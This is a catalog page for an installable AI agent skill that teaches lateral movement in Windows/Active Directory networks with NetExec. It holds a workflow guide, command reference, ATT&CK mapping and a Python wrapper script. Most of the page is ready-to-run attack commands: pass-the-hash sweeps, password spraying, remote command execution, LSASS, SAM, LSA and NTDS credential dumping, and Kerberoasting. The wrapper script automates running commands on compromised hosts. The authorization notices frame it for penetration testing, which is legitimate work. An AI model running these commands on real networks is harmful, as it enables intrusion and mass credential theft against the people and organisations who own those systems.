penetration testing

Moving Laterally with NetExec

Use NetExec for SMB, WinRM, LDAP, and MSSQL enumeration, password spraying, and execution.

active-directorycredential-accesslateral-movementnetexecpassword-sprayingpost-exploitationsmbwinrm
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

Authorized Use Only: This skill is for authorized penetration testing, red-team engagements, and educational labs only. NetExec authenticates to, executes code on, and extracts credentials from remote hosts. Running it against systems you do not own or lack explicit written authorization to test is illegal under computer-misuse laws (e.g. the US CFAA, UK Computer Misuse Act). Confirm scope and rules of engagement before use.

Overview

NetExec (nxc) is the actively maintained successor to CrackMapExec, a network-service swiss-army knife for assessing and exploiting Windows/Active Directory and Linux environments. It wraps Impacket and other libraries behind a unified CLI so an operator can authenticate against many hosts at once, validate harvested credentials, spray passwords, enumerate shares/users/policies, execute commands, and dump credentials — all while logging cleanly for reporting.

NetExec is protocol-oriented: every invocation starts with a protocol module. As of the 2025 releases it supports smb, winrm, mssql, ldap, ssh, ftp, wmi, rdp, vnc, and nfs. Command execution (-x/-X) is available on SMB, WINRM, SSH, MSSQL, WMI and (since summer 2025) RDP. A built-in module system (-M) adds capabilities such as LAPS retrieval, LSASS dumping via lsassy, BloodHound collection, and share spidering.

For lateral movement specifically, NetExec maps directly to MITRE ATT&CK T1021.002 (Remote Services: SMB/Windows Admin Shares): it authenticates over SMB (port 445), reaches ADMIN$/C$, and uses named-pipe or task-scheduler execution to run code on remote machines. The (Pwn3d!) marker in output signals that the supplied principal has local-admin code-execution rights on a host — the green light for lateral movement.

When to Use

  • During an internal network penetration test after obtaining one or more valid credentials/hashes, to identify every host where those credentials grant admin access.
  • To perform controlled password spraying against a domain while respecting lockout thresholds.
  • To enumerate SMB shares, domain users, password policy, and loggedon sessions across a subnet in one sweep.
  • To execute commands or dump SAM/LSA/NTDS credentials on authorized targets during post-exploitation.
  • To collect BloodHound data or LAPS passwords using NetExec modules instead of separate tooling.

Prerequisites

  • A Linux operator host (Kali/Parrot/Ubuntu). Install via pipx (recommended):
    sudo apt install -y pipx git
    pipx ensurepath
    pipx install git+https://github.com/Pennyw0rth/NetExec
    # verify
    nxc --version
    nxc smb --help
  • Docker alternative:
    git clone https://github.com/Pennyw0rth/NetExec
    cd NetExec
    docker build -t netexec .
    docker run --rm -it netexec smb --help
  • Network reachability to target ports (445/SMB, 5985-5986/WinRM, 389-636/LDAP, 1433/MSSQL).
  • Valid credentials, NT hashes, or Kerberos tickets within an authorized scope.
  • A signed rules-of-engagement document and knowledge of the account-lockout policy before spraying.

Objectives

  • Validate harvested credentials across a host range and locate (Pwn3d!) admin access.
  • Enumerate shares, users, and password policy over SMB and LDAP.
  • Conduct lockout-safe password spraying with --continue-on-success.
  • Execute commands on authorized hosts and select an appropriate --exec-method.
  • Dump SAM, LSA, and NTDS credentials and collect them into the NetExec workspace.
  • Drive AD attacks (Kerberoasting, ASREPRoast, BloodHound collection) through LDAP modules.

MITRE ATT&CK Mapping

Technique ID Official Name How NetExec Implements It
T1021.002 Remote Services: SMB/Windows Admin Shares Authenticates over SMB to ADMIN$/C$ and executes code on remote hosts (-x, --exec-method)
T1110.003 Brute Force: Password Spraying One password against many accounts with --continue-on-success
T1003.002 OS Credential Dumping: Security Account Manager --sam dumps local SAM hashes
T1003.004 OS Credential Dumping: LSA Secrets --lsa dumps LSA secrets and cached credentials
T1003.006 OS Credential Dumping: DCSync --ntds via drsuapi extracts the domain database
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting ldap --kerberoasting requests service tickets
T1087.002 Account Discovery: Domain Account --users, --rid-brute enumerate domain accounts
T1135 Network Share Discovery --shares, -M spider_plus enumerate accessible shares

Workflow

1. Validate credentials and find admin access

Sweep a subnet with a credential pair or NT hash. A trailing (Pwn3d!) marks hosts where the principal has admin code execution — these are your lateral-movement targets.

# Cleartext password across a /24
nxc smb 192.168.1.0/24 -u jsmith -p 'Summer2025!' -d corp.local
 
# Pass-the-hash (NT only or LM:NT)
nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
nxc smb 10.10.10.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

2. Enumerate the environment

Pull users, shares, password policy, loggedon sessions, and active sessions to plan movement.

nxc smb dc01.corp.local -u jsmith -p 'Summer2025!' --users
nxc smb dc01.corp.local -u jsmith -p 'Summer2025!' --pass-pol
nxc smb 192.168.1.0/24 -u jsmith -p 'Summer2025!' --shares
nxc smb 192.168.1.0/24 -u jsmith -p 'Summer2025!' --loggedon-users --sessions
# RID brute for accounts when listing is blocked
nxc smb dc01.corp.local -u jsmith -p 'Summer2025!' --rid-brute 10000

3. Password-spray safely

Spray one password against a user list, staying under the lockout threshold. --continue-on-success keeps testing every account instead of stopping at the first hit.

# Discover the lockout policy FIRST
nxc smb dc01.corp.local -u jsmith -p 'Summer2025!' --pass-pol
 
# Spray a single password across many users
nxc smb dc01.corp.local -u users.txt -p 'Welcome2025!' --continue-on-success
 
# Validate a credential set across the domain without bruteforcing
nxc ldap dc01.corp.local -u users.txt -p 'Spring2025!' --continue-on-success --no-bruteforce

4. Execute commands on authorized hosts

On (Pwn3d!) targets, run commands and choose a quieter execution channel when needed.

# Default execution
nxc smb 192.168.1.50 -u Administrator -H <hash> -x 'whoami /all'
 
# Pick an exec method: smbexec, wmiexec, atexec, mmcexec
nxc smb 192.168.1.50 -u Administrator -H <hash> --exec-method wmiexec -x 'hostname'
 
# PowerShell over WinRM (amsi-bypassed, base64-encoded transparently)
nxc winrm 192.168.1.50 -u Administrator -H <hash> -X '$PSVersionTable'

5. Dump credentials

Harvest local and domain credentials from authorized hosts to fuel further movement.

# Local SAM hashes and LSA secrets
nxc smb 192.168.1.50 -u Administrator -H <hash> --sam --lsa
 
# In-memory LSASS dump via the lsassy module
nxc smb 192.168.1.50 -u Administrator -H <hash> -M lsassy
 
# Domain database from a DC (DRSUAPI default, or VSS)
nxc smb dc01.corp.local -u Administrator -H <hash> --ntds
nxc smb dc01.corp.local -u Administrator -H <hash> --ntds vss

6. Drive AD attacks via LDAP and modules

Use protocol modules to pivot to ticket attacks, delegation, LAPS, and BloodHound ingestion.

# Kerberoasting and ASREPRoasting
nxc ldap dc01.corp.local -u jsmith -p 'Summer2025!' --kerberoasting kerb.out
nxc ldap dc01.corp.local -u jsmith -p 'Summer2025!' --asreproast asrep.out
 
# Read LAPS passwords where permitted
nxc ldap dc01.corp.local -u jsmith -p 'Summer2025!' -M laps
 
# Collect BloodHound data
nxc ldap dc01.corp.local -u jsmith -p 'Summer2025!' --bloodhound --collection All --dns-server 192.168.1.10
 
# MSSQL command/query execution
nxc mssql 192.168.1.60 -u sa -p 'Sql2025!' --local-auth -q 'SELECT name FROM sys.databases'
nxc mssql 192.168.1.60 -u sa -p 'Sql2025!' --local-auth -x 'whoami'

7. Review the workspace and report

NetExec stores results in a per-protocol SQLite workspace under ~/.nxc/. Review captured credentials and admin relationships for the report.

nxc smb -L              # list SMB modules
ls ~/.nxc/workspaces/
nxc smb 192.168.1.0/24 -u jsmith -p 'Summer2025!' --shares --log spray_results.log

Tools and Resources

Tool Purpose Source
NetExec (nxc) Multi-protocol network exploitation https://github.com/Pennyw0rth/NetExec
NetExec Wiki Official docs and per-protocol flags https://www.netexec.wiki/
Impacket Underlying SMB/MSSQL/Kerberos libraries https://github.com/fortra/impacket
lsassy Remote LSASS extraction (NetExec module) https://github.com/login-securite/lsassy
BloodHound CE Graph analysis of collected AD data https://github.com/SpecterOps/BloodHound
NetExec Cheat Sheet Command reference https://www.stationx.net/netexec-cheat-sheet/

Validation Criteria

  • NetExec installed and nxc --version confirmed.
  • Account-lockout policy reviewed before any spraying.
  • Credentials validated across the in-scope host range.
  • (Pwn3d!) admin-access hosts enumerated and documented.
  • Shares, users, and password policy collected.
  • Password spraying performed under lockout thresholds with --continue-on-success.
  • Command execution tested with an appropriate --exec-method.
  • Credential dumping (--sam/--lsa/--ntds) performed only on authorized targets.
  • LDAP attacks (Kerberoasting/ASREPRoast/LAPS/BloodHound) executed where in scope.
  • Workspace results exported and included in the engagement report.
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 2

api-reference.md2.4 KB

NetExec (nxc) — API / Command Reference

General Syntax

nxc [runtime options] <protocol> <target> [auth] [actions] [-M module] [-o KEY=val]

Supported protocols: smb winrm mssql ldap ssh ftp wmi rdp vnc nfs.

Authentication Flags

Flag Description
-u USER Username (or file of usernames)
-p PASS Password (or file of passwords)
-H HASH NT hash or LM:NT for pass-the-hash
-d DOMAIN Target domain
--local-auth Authenticate against the local SAM, not the domain
-k / --use-kcache Kerberos auth using ccache (KRB5CCNAME)
--continue-on-success Keep testing after a valid login (spraying)
--no-bruteforce Pair user[i] with pass[i] instead of full matrix

SMB Actions

Flag Description
--shares List accessible shares and permissions
--users / --groups Enumerate domain users / groups
--pass-pol Dump password / lockout policy
--rid-brute [N] Enumerate accounts by RID cycling
--loggedon-users / --sessions Show logged-on users / active sessions
-x CMD / -X PS Execute shell / PowerShell command
--exec-method M smbexec, wmiexec, atexec, mmcexec
--sam / --lsa Dump SAM hashes / LSA secrets
--ntds [vss|drsuapi] Dump the domain NTDS.dit
-M MODULE Run a module (e.g. lsassy, spider_plus)

LDAP Actions

Flag Description
--kerberoasting FILE Request and save Kerberoastable hashes
--asreproast FILE Request and save AS-REP roastable hashes
--bloodhound --collection All Collect BloodHound data
--trusted-for-delegation Find delegation-enabled accounts
-M laps Read LAPS passwords

WinRM / MSSQL Actions

Flag Description
winrm ... -X 'PScmd' Execute PowerShell over WinRM (5985/5986)
mssql ... -q 'SQL' Run a SQL query
mssql ... -x 'cmd' Execute OS command via xp_cmdshell

Modules and Workspace

nxc smb -L            # list SMB modules
nxc smb -M lsassy --options   # show module options
ls ~/.nxc/workspaces/         # SQLite result store
nxc smb <t> ... --log out.log # tee output to file

External References

standards.md2.0 KB

Standards and References — Moving Laterally with NetExec

MITRE ATT&CK References

Technique ID Name Tactic Rationale
T1021.002 Remote Services: SMB/Windows Admin Shares Lateral Movement NetExec authenticates to ADMIN$/C$ and runs code on remote hosts
T1110.003 Brute Force: Password Spraying Credential Access --continue-on-success sprays one password across many accounts
T1003.002 OS Credential Dumping: Security Account Manager Credential Access --sam extracts local account hashes
T1003.004 OS Credential Dumping: LSA Secrets Credential Access --lsa extracts LSA secrets and cached domain creds
T1003.006 OS Credential Dumping: DCSync Credential Access --ntds replicates the domain database via DRSUAPI
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting Credential Access ldap --kerberoasting requests crackable service tickets
T1087.002 Account Discovery: Domain Account Discovery --users / --rid-brute enumerate domain accounts
T1135 Network Share Discovery Discovery --shares enumerates accessible SMB shares

NIST Cybersecurity Framework 2.0

ID Name Rationale
DE.CM-01 Networks and network services are monitored to find potentially adverse events NetExec activity (mass auth, exec, dumping) is the adverse behavior defenders must detect; this skill informs detection coverage

Official Resources

Key Research

  • Black Hills InfoSec: Getting Started with NetExec
  • StationX: NetExec Cheat Sheet (2026 Guide)
  • Vaadata: NetExec, the Tool for Auditing an Internal Network

Scripts 1

agent.py4.9 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
# For authorized penetration testing and educational environments only.
# Usage against targets without prior mutual written consent is illegal.
# It is the end user's responsibility to obey all applicable laws.
"""NetExec lateral-movement helper.

Wraps the `nxc` CLI to validate credentials across a host range, identify
admin (Pwn3d!) access, enumerate shares, and optionally run a command.
Parses NetExec stdout to produce a structured JSON report.
"""

import argparse
import json
import re
import shutil
import subprocess
import sys
from datetime import datetime, timezone

# NetExec marks admin code-exec hosts with (Pwn3d!) and successes with [+]
PWNED_RE = re.compile(r"^(?P<proto>\w+)\s+(?P<ip>[\d.]+)\s+\d+\s+(?P<host>\S+)\s+"
                      r"\[\+\]\s+(?P<cred>\S+)(?P<pwned>\s+\(Pwn3d!\))?", re.M)


def ensure_nxc():
    """Verify the nxc binary is on PATH."""
    if shutil.which("nxc") is None:
        sys.exit("[!] nxc not found. Install: pipx install "
                 "git+https://github.com/Pennyw0rth/NetExec")


def run_nxc(args_list, timeout=600):
    """Run an nxc command and return combined stdout/stderr text."""
    cmd = ["nxc"] + args_list
    print(f"[*] {' '.join(cmd)}")
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return proc.stdout + proc.stderr
    except subprocess.TimeoutExpired:
        return "[!] nxc timed out"
    except FileNotFoundError:
        sys.exit("[!] nxc not found on PATH")


def parse_results(output):
    """Extract successful auths and admin (Pwn3d!) hosts from nxc output."""
    successes, pwned = [], []
    for m in PWNED_RE.finditer(output):
        rec = {"protocol": m.group("proto"), "ip": m.group("ip"),
               "host": m.group("host"), "cred": m.group("cred"),
               "admin": bool(m.group("pwned"))}
        successes.append(rec)
        if rec["admin"]:
            pwned.append(rec)
    return successes, pwned


def build_auth(args):
    """Build the auth portion of an nxc command."""
    auth = ["-u", args.user]
    if args.hash:
        auth += ["-H", args.hash]
    elif args.password:
        auth += ["-p", args.password]
    if args.domain:
        auth += ["-d", args.domain]
    if args.local_auth:
        auth += ["--local-auth"]
    return auth


def main():
    p = argparse.ArgumentParser(description="NetExec lateral-movement helper")
    p.add_argument("target", help="Target IP, CIDR, or hosts file")
    p.add_argument("-u", "--user", required=True, help="Username or users file")
    p.add_argument("-p", "--password", help="Password or passwords file")
    p.add_argument("-H", "--hash", help="NT hash or LM:NT for pass-the-hash")
    p.add_argument("-d", "--domain", help="AD domain")
    p.add_argument("--protocol", default="smb",
                   choices=["smb", "winrm", "ldap", "mssql", "ssh", "wmi", "rdp"])
    p.add_argument("--local-auth", action="store_true", help="Use local SAM auth")
    p.add_argument("--shares", action="store_true", help="Enumerate shares on hits")
    p.add_argument("--spray", action="store_true",
                   help="Add --continue-on-success for password spraying")
    p.add_argument("--exec", dest="exec_cmd", help="Command to run on Pwn3d! hosts")
    p.add_argument("--exec-method", choices=["smbexec", "wmiexec", "atexec", "mmcexec"])
    p.add_argument("--output", help="Write JSON report to file")
    args = p.parse_args()

    if not args.password and not args.hash:
        p.error("provide -p/--password or -H/--hash")

    ensure_nxc()
    report = {"generated": datetime.now(timezone.utc).isoformat(),
              "target": args.target, "protocol": args.protocol}

    # 1. Validate credentials
    cmd = [args.protocol, args.target] + build_auth(args)
    if args.spray:
        cmd.append("--continue-on-success")
    output = run_nxc(cmd)
    successes, pwned = parse_results(output)
    report["successful_auths"] = successes
    report["admin_hosts"] = pwned
    print(f"[+] {len(successes)} successful auth(s), {len(pwned)} with admin access")

    # 2. Optional share enumeration
    if args.shares and successes:
        sh = run_nxc([args.protocol, args.target] + build_auth(args) + ["--shares"])
        report["shares_raw"] = sh.strip().splitlines()[-50:]

    # 3. Optional command execution on admin hosts
    if args.exec_cmd and pwned:
        report["exec_results"] = {}
        for host in pwned:
            ex = [args.protocol, host["ip"]] + build_auth(args) + ["-x", args.exec_cmd]
            if args.exec_method:
                ex += ["--exec-method", args.exec_method]
            report["exec_results"][host["ip"]] = run_nxc(ex).strip().splitlines()[-20:]

    if args.output:
        with open(args.output, "w") as f:
            json.dump(report, f, indent=2)
        print(f"[+] Report written to {args.output}")
    else:
        print(json.dumps(report, indent=2))


if __name__ == "__main__":
    main()
Keep exploring